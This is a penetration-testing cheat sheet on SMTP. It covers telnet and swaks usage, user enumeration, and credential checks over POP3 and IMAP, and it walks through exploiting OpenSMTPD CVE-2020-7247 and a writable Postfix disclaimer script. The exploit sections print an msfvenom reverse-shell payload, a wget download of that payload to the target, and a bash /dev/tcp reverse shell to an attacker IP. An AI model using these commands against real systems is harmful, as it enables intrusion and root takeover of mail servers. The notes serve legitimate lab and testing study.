25,587 - SMTP

The Simple Mail Transfer Protocol (SMTP) is used to send emails on ports 25 and 587. The former is used used mainly for server-to-server email delivery and is often blocked by ISPs to prevent spam. The latter is used by users to send emails through their mail provider and it requires authentication (username & password); it is the modern, secure way to submit outgoing mail.

Usage

Telnet

# Connect to SMTP server
telnet mail.example.com 25
openssl s_client -connect <ip>:587

# Greet the server
HELO attacker.com
# or
EHLO attacker.com          # Extended SMTP (for authentication & more)

# Specify the sender email
MAIL FROM:<sender@example.com>

# Specify the recipient email
RCPT TO:<recipient@example.com>

# Start composing the email message
DATA

# Write email headers and body (end with a single dot '.' on a line)
Subject: Test Email

This is the email body.
.

# Authenticate using base64 encoded username and password (if needed)
AUTH LOGIN
<base64-username>
<base64-password>

# Close the session
QUIT

swaks

The Swiss Army Knife for SMTP (swaks) is a CLI tool designed for testing and troubleshooting SMTP servers. It allows full control over the SMTP conversation and supports authentication, TLS, custom headers, attachments, and scripting, making it useful for verifying email server configurations, debugging, and crafting test messages in Red Team or penetration testing scenarios.

swaks --to x1337@hacking.com --from x7331@hacking.com --header "Subject: Hello" --body @body.txt --attach @config.Lib-ms --server 192.168.1.1 --port 25 --auth LOGIN --auth-user x7331@hacking.com --auth-password 'Pass123!'

# Multiple targets
swaks --to $(cat emails.txt | tr '\n' ',') ...

smtp-user-enum

smtp-user-enum is a CLI tool used to enumerate valid usernames on SMTP servers. It leverages SMTP commands like VRFY and RCPT TO to test for user existence, helping penetration testers identify valid email accounts for further attack stages such as phishing or password guessing.

smtp-user-enum -M VRFY -U usernames -t <target-IP>

The users can be validated manually via POP3 (110) and/or IMAP (143):

# Verify users via POP3
$ telnet <target-IP> 110

USER x7331
+OK # User exists
PASS test
-ERR [AUTH] Authentication failed. # Invalid password
USER x7331
+OK
PASS Passw0rd123!
+OK Logged in. # Valid password

# Validate users via IMAP
$ telnet <target-IP> 143

a1 LOGIN x7331 Passw0rd123!
a1 OK [CAPABILITY ... SPECIAL-USE] Logged in # Valid creds

Servers

OpenSMTPD - RCE

OpenSMTPD is a free and open-source mail transfer agent (MTA) developed as part of the OpenBSD project. Designed with security and simplicity in mind, it implements the SMTP to handle the sending and receiving of email. OpenSMTPD aims to provide a secure and easy-to-audit alternative to more complex MTAs. It is commonly deployed on Unix-like systems and is known for a minimal codebase, privilege separation, and strict adherence to secure coding practices.

OpenSMTPD versions from 6.4 to 6.6.1 are vulnerable to CVE-2020-7247 and allows RCE as root via specially crafted SMTP messages. The issue arises from improper input validation in the smtpctl or mail-from handling logic, where attacker-supplied input is passed directly to a shell without sanitization. By sending a maliciously crafted email address, arbitrary shell commands can be executed on the target system with elevated privileges.

$ searchsploit OpenSMTPD
OpenSMTPD 6.6.1 - Remote Code Execution | linux/remote/47984.py

# Create reverse shell payload
$ msfvenom -p linux/x64/shell_reverse_tcp LHOST=192.168.45.170 LPORT=25 -f elf -o revshell.elf

# Transfer malicious file
$ python3 47984.py bratarina 25 "wget 192.168.45.170/revshell.elf -O /tmp/revshell.elf"

# Assign execute permissions
 python3 47984.py bratarina 25 "chmod +x /tmp/revshell.elf && ./tmp/revshell.elf"
                                                                                                                                                                                                                 
# Execute the file                                                                                                                                                                                                                           
$ python3 47984.py bratarina 25 "/tmp/revshell.elf" 

PostFix

Postfix is a MTA used on Unix-like systems to route and deliver email. It typically operates on TCP port 25 and is widely deployed as a default mail server due to its speed, ease of configuration, and security features.

Disclaimer Files

A disclaimer file in the context of SMTP email systems is typically a plaintext, bash script, or HTML-formatted message automatically appended to the body of outbound emails. It is most commonly used to attach legal warnings, confidentiality notices, or company branding. These disclaimers are not a function of the SMTP protocol itself, but are implemented through external tools or content filters that process outgoing mail before it reaches the final MTA.

In practice, these disclaimers are inserted using mail filters or milter-compatible tools like altermime, MIMEDefang, or Amavis, often integrated into MTAs such as Postfix, Exim, or Sendmail. The disclaimer content is usually stored in a local file, and its location depends on the specific configuration of the mail system. Common paths include /etc/postfix/disclaimer.txt, /usr/local/etc/disclaimer.txt, or within a custom script or filter directory.

# Sending an email
swaks --to targetEmail@domain.com --from x7331@domain.com --header "Disclaimer file" --body @body.txt --server <target-IP> --port 25

# Inspecting what's happening with pspy, i.e., disclaimer file automatically appended
$ ./pspy64
2025/07/26 15:33:12 CMD: UID=997   PID=38173  | pipe -n dfilt -t unix flags=Rq user=filter argv=/etc/postfix/disclaimer -f ${sender} -- ${recipient}
2025/07/26 15:33:12 CMD: UID=997   PID=38174  | /bin/bash /etc/postfix/disclaimer -f x7331@domain.com -- targetEmail@domain.com

If writable access is available, it can be leveraged for PE:

# Check what files the group have permissions on
$ find / -group filter 2>/dev/null
/etc/postfix/disclaimer

# Linpeas can also highlight it
╔══════════╣ Interesting GROUP writable files (not in Home) (max 200)
╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#writable-files
  Group filter:
/etc/postfix/disclaimer

# Insert reverse shell code to the file
$ head /etc/postfix/disclaimer
#!/bin/bash
bash -i >& /dev/tcp/192.168.45.170/80 0>&1

On the next email sent, the reverse shell code will be executed.